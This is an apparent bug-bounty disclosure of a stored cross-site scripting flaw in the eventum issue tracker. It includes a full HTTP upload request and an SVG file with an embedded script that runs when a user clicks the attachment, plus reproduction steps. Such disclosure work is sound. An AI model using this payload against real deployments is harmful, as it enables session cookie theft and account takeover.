Cross-site Scripting (XSS) - Stored in eventum/eventum
Valid
Reported on
Oct 27th 2021
Description
Stored XSS via upload 'Attached Files' with format .svg
Proof of Concept
// PoC.req
POST /ajax/upload.php?file=dropfile HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1102758315284593653277397155
Content-Length: 1429
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/file_upload.php?iss_id=1
Cookie: euCookie=1; PHPSESSID=ii4ngj3mfm4nicm6ou1mra8e0k; eventum=YTo0OntzOjU6ImVtYWlsIjtzOjE3OiJhZG1pbkBleGFtcGxlLmNvbSI7czoxMDoibG9naW5fdGltZSI7aToxNjM1MzQ4OTE0O3M6OToicGVybWFuZW50IjtiOjE7czo0OiJoYXNoIjtzOjMyOiI5MjZhZjc0MDhlOWQ2OWYzYWNhMmQ5MjNiODEyZDAxYiI7fQ%3D%3D; REMEMBERME=RXZlbnR1bVxNb2RlbFxFbnRpdHlcVXNlcjpZV1J0YVc1QVpYaGhiWEJzWlM1amIyMD06MTY2Njg3NTg2NjoyZDEyNTEzZjExYTBlMDY3ZmZjNWQ2ZWFkODRkZTNiOGM5MjQ2ZmJhYTk3NGViMzQ3ZjQ3MDRjNDJlMDZlODhm; eventum_project=YToyOntzOjY6InByal9pZCI7aToxO3M6ODoicmVtZW1iZXIiO2k6MDt9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="filesize"
392
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="cat"
upload_file
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="issue_id"
1
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="iaf_ids"
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="minimum_role"
1
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="file_description"
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="null"
Upload File
-----------------------------1102758315284593653277397155
Content-Disposition: form-data; name="dropfile[]"; filename="123.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
-----------------------------1102758315284593653277397155--
Step to Reproduct
Create a file .svg contain payload
Example
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Goto Create Issue and upload .svg file
The XSS will trigger when user click to filename. Example : http://[DOMAIN]/download.php?cat=attachment&id=3
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
References
We have contacted a member of the
eventum
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
eventum
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
eventum
team.
We will try again in 10 days.
2 years ago
2 years ago
to join this conversation